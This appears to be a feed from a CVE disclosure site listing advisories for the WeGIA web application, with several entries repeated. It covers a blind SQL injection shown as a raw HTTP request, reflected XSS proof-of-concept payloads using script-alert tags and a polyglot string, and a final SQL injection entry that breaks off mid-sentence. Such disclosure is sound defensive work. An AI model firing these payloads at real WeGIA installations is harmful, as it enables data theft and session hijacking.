2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53823/ https://www.cvehunters.com/p/cve-2025-53823/ <h2 id="cve-2025-53823-sql-injection-blind-time-based-vulnerability-in-id_socio-parameter-on-processa_deletar_sociophp-endpoint">CVE-2025-53823: SQL Injection (Blind Time-Based) Vulnerability in <code>id_socio</code> Parameter on <code>processa_deletar_socio.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53823" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53823</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_socio</code> parameter of the <code>/WeGIA/html/socio/sistema/processa_deletar_socio.php</code> endpoint. This vulnerability allows the execution of arbitrary SQL commands, which can compromise the confidentiality, integrity, and availability of stored data.</p> <h2 id="details">Details </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /WeGIA/html/socio/sistema/processa_deletar_socio.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">Cookie: _ga=GA1.1.1386467242.1751041360; PHPSESSID=dqkolkdi6a6546qv0nnjj0lo86; _ga_F8DXBXLV8J=GS2.1.s1751041359$o1$g1$t1751047102$j12$l0$h0 </span></span><span class="line"><span class="cl">Content-Length: 24 </span></span><span class="line"><span class="cl">Sec-Ch-Ua-Platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.9 </span></span><span class="line"><span class="cl">Sec-Ch-Ua: "Not.A/Brand";v="99", "Chromium";v="136" </span></span><span class="line"><span class="cl">Sec-Ch-Ua-Mobile: ?0 </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: / </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded; charset=UTF-8 </span></span><span class="line"><span class="cl">Origin: https://sec.wegia.org:8000 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/ </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Priority: u=1, i </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">id_socio=1&pessoa=fisica </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p><img src="/p/cve-2025-53823/image.png" width="1906" height="732" srcset="/p/cve-2025-53823/image_hu_bf5d4673fc5021aa.png 480w, /p/cve-2025-53823/image_hu_3f7975a45248e0df.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="260" data-flex-basis="624px" ></p><h2 id="cve-2025-53823-sql-injection-blind-time-based-vulnerability-in-id_socio-parameter-on-processa_deletar_sociophp-endpoint">CVE-2025-53823: SQL Injection (Blind Time-Based) Vulnerability in <code>id_socio</code> Parameter on <code>processa_deletar_socio.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53823" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53823</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_socio</code> parameter of the <code>/WeGIA/html/socio/sistema/processa_deletar_socio.php</code> endpoint. This vulnerability allows the execution of arbitrary SQL commands, which can compromise the confidentiality, integrity, and availability of stored data.</p> <h2 id="details">Details </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /WeGIA/html/socio/sistema/processa_deletar_socio.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">Cookie: _ga=GA1.1.1386467242.1751041360; PHPSESSID=dqkolkdi6a6546qv0nnjj0lo86; _ga_F8DXBXLV8J=GS2.1.s1751041359$o1$g1$t1751047102$j12$l0$h0 </span></span><span class="line"><span class="cl">Content-Length: 24 </span></span><span class="line"><span class="cl">Sec-Ch-Ua-Platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.9 </span></span><span class="line"><span class="cl">Sec-Ch-Ua: "Not.A/Brand";v="99", "Chromium";v="136" </span></span><span class="line"><span class="cl">Sec-Ch-Ua-Mobile: ?0 </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: / </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded; charset=UTF-8 </span></span><span class="line"><span class="cl">Origin: https://sec.wegia.org:8000 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/ </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Priority: u=1, i </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">id_socio=1&pessoa=fisica </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p><img src="/p/cve-2025-53823/image.png" width="1906" height="732" srcset="/p/cve-2025-53823/image_hu_bf5d4673fc5021aa.png 480w, /p/cve-2025-53823/image_hu_3f7975a45248e0df.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="260" data-flex-basis="624px" /></p> <p><img src="/p/cve-2025-53823/image-2.png" width="1912" height="730" srcset="/p/cve-2025-53823/image-2_hu_137be9761b6d02cd.png 480w, /p/cve-2025-53823/image-2_hu_20fbca3e6290c25.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="628px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-p8xr-qg3c-6ww2" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-p8xr-qg3c-6ww2</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 14 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53824/ https://www.cvehunters.com/p/cve-2025-53824/ <h2 id="cve-2025-53824-cross-site-scripting-xss-reflected-endpoint-cadastro_petphp-parameter-msg">CVE-2025-53824: Cross-Site Scripting (XSS) Reflected endpoint <code>cadastro_pet.php</code> parameter <code>msg</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53824" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53824</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_pet.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>msg</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET html/pet/cadastro_pet.php</code></p> <p>Parameter: <code>msg</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="s1">';alert(String.fromCharCode(88,83,83))//'</span><span class="p">;</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mi">88</span><span class="p">,</span><span class="mi">83</span><span class="p">,</span><span class="mi">83</span><span class="p">))</span><span class="c1">//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> </span></span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53824/image.png" width="909" height="195" srcset="/p/cve-2025-53824/image_hu_dab014e19e118e64.png 480w, /p/cve-2025-53824/image_hu_9c6c930cedafbd51.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="466" data-flex-basis="1118px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-53824-cross-site-scripting-xss-reflected-endpoint-cadastro_petphp-parameter-msg">CVE-2025-53824: Cross-Site Scripting (XSS) Reflected endpoint <code>cadastro_pet.php</code> parameter <code>msg</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53824" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53824</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_pet.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>msg</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET html/pet/cadastro_pet.php</code></p> <p>Parameter: <code>msg</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="s1">';alert(String.fromCharCode(88,83,83))//'</span><span class="p">;</span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mi">88</span><span class="p">,</span><span class="mi">83</span><span class="p">,</span><span class="mi">83</span><span class="p">))</span><span class="c1">//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> </span></span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53824/image.png" width="909" height="195" srcset="/p/cve-2025-53824/image_hu_dab014e19e118e64.png 480w, /p/cve-2025-53824/image_hu_9c6c930cedafbd51.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="466" data-flex-basis="1118px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-86r7-gc8h-63gh" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-86r7-gc8h-63gh</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 14 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53377/ https://www.cvehunters.com/p/cve-2025-53377/ <h2 id="cve-2025-53377-cross-site-scripting-xss-reflected-endpoint-cadastro_dependente_pessoa_novaphp-parameter-id_funcionario">CVE-2025-53377: Cross-Site Scripting (XSS) Reflected endpoint <code>cadastro_dependente_pessoa_nova.php</code> parameter <code>id_funcionario</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53377" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53377</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_dependente_pessoa_nova.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>id_funcionario</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/funcionario/cadastro_dependente_pessoa_nova.php</code></p> <p>Parameter: <code>id_funcionario</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="mi">1</span><span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1337</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53377/image.png" width="783" height="830" srcset="/p/cve-2025-53377/image_hu_916b39df13121479.png 480w, /p/cve-2025-53377/image_hu_be592415902b7b4b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="94" data-flex-basis="226px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-53377-cross-site-scripting-xss-reflected-endpoint-cadastro_dependente_pessoa_novaphp-parameter-id_funcionario">CVE-2025-53377: Cross-Site Scripting (XSS) Reflected endpoint <code>cadastro_dependente_pessoa_nova.php</code> parameter <code>id_funcionario</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53377" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53377</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_dependente_pessoa_nova.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>id_funcionario</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/funcionario/cadastro_dependente_pessoa_nova.php</code></p> <p>Parameter: <code>id_funcionario</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="mi">1</span><span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1337</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53377/image.png" width="783" height="830" srcset="/p/cve-2025-53377/image_hu_916b39df13121479.png 480w, /p/cve-2025-53377/image_hu_be592415902b7b4b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="94" data-flex-basis="226px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qgrq-qjq6-h6gj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qgrq-qjq6-h6gj</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53525/ https://www.cvehunters.com/p/cve-2025-53525/ <h2 id="cve-2025-53525-cross-site-scripting-xss-reflected-endpoint-profile_familiarphp-parameter-id_dependente">CVE-2025-53525: Cross-Site Scripting (XSS) Reflected endpoint <code>profile_familiar.php</code> parameter <code>id_dependente</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53525" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53525</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>profile_familiar.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>id_dependente</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/atendido/profile_familiar.php</code></p> <p>Parameter: <code>id_dependente</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53525/image.png" width="719" height="387" srcset="/p/cve-2025-53525/image_hu_3838ecfb5877b657.png 480w, /p/cve-2025-53525/image_hu_2be71b163f884c00.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="445px" ></p> <p><img src="/p/cve-2025-53525/image-1.png" width="1071" height="559" srcset="/p/cve-2025-53525/image-1_hu_5da17087cd8d939f.png 480w, /p/cve-2025-53525/image-1_hu_8abfd2784d7d0262.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-53525-cross-site-scripting-xss-reflected-endpoint-profile_familiarphp-parameter-id_dependente">CVE-2025-53525: Cross-Site Scripting (XSS) Reflected endpoint <code>profile_familiar.php</code> parameter <code>id_dependente</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53525" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53525</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>profile_familiar.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>id_dependente</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/atendido/profile_familiar.php</code></p> <p>Parameter: <code>id_dependente</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53525/image.png" width="719" height="387" srcset="/p/cve-2025-53525/image_hu_3838ecfb5877b657.png 480w, /p/cve-2025-53525/image_hu_2be71b163f884c00.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="445px" /></p> <p><img src="/p/cve-2025-53525/image-1.png" width="1071" height="559" srcset="/p/cve-2025-53525/image-1_hu_5da17087cd8d939f.png 480w, /p/cve-2025-53525/image-1_hu_8abfd2784d7d0262.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-982x-v58q-6qpj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-982x-v58q-6qpj</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53527/ https://www.cvehunters.com/p/cve-2025-53527/ <h2 id="cve-2025-53527-sql-injection-vulnerability-in-tipo-and-responsavel-parameters-on-relatorio_geracaophp-endpoint">CVE-2025-53527: SQL Injection Vulnerability in <code>tipo</code> and <code>responsavel</code> Parameters on <code>relatorio_geracao.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53527" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53527</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the <code>tipo</code> and <code>responsavel</code> parameters of the <code>/controle/relatorio_geracao.php</code> endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: 